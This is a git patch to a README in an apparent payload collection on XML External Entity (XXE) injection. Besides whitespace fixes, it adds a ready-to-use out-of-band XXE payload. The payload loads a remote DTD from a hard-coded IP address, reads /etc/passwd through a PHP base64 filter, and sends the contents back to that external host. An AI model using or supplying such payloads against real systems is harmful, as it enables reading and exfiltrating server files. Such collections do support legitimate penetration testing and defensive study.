From 240e46e1e1a20ad7d417dc043813091cccf1c738 Mon Sep 17 00:00:00 2001
From: Swissky <maxropelewski@gmail.com>
Date: Wed, 28 Jun 2017 21:43:30 +0200
Subject: [PATCH] XXE via DTD and PHP Filter

---
 XXE injections/README.md | 21 ++++++++++++++++++---
 1 file changed, 18 insertions(+), 3 deletions(-)

diff --git a/XXE injections/README.md b/XXE injections/README.md
index 325990b..9ff5a47 100644
--- a/XXE injections/README.md	
+++ b/XXE injections/README.md	
@@ -1,5 +1,5 @@
 # XML External Entity
-An XML External Entity attack is a type of attack against an application that parses XML input	
+An XML External Entity attack is a type of attack against an application that parses XML input
 
 ## Exploit
 
@@ -39,7 +39,7 @@ PHP Wrapper inside XXE
     <zipcode>75000</zipcode>
     <city>Paris</city>
   </contact>
-</contacts> 
+</contacts>
 ```
 
 
@@ -80,7 +80,22 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
 %all;
 ```
 
+XXE OOB with DTD and PHP filter
+```
+<?xml version="1.0" ?>
+<!DOCTYPE r [
+<!ELEMENT r ANY >
+<!ENTITY % sp SYSTEM "http://92.222.81.2/dtd.xml">
+%sp;
+%param1;
+]>
+<r>&exfil;</r>
+
+File stored on http://92.222.81.2/dtd.xml
+<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
+```
 
 ## Thanks to
 * https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
-* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
\ No newline at end of file
+* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html